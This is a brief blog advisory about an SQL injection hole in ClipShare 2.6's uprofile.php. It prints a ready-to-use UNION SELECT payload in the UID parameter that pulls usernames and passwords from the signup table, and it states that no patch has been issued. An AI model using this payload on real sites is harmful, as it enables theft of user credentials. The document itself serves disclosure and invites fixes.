ClipShare 2.6 uprofile.php SQL Injection Vulnerability

This is the security issue primarily reported by Krit. and Pr0metheuS. ClipShare leading PHP video sharing script has an SQL injection exploit in user profile page(uprofile.php). ClipShare application does not properly sanitize user supplied UID data before using in an SQL query. Hackers can use this exploit to access or alter user database.

Exmple URI:

http://www.example.com/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2
0,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*

ClipShare not issued any patch to fix this issue. If you have any idea to fix this issue or have patch please share it here so others can benifited from your contribution.

Written by Hemant Patel

Hemant, hailing from Bhopal, Madhya Pradesh, India, is a web developer and occasional blogger passionate about exchanging ideas and addressing problems in his coding journey.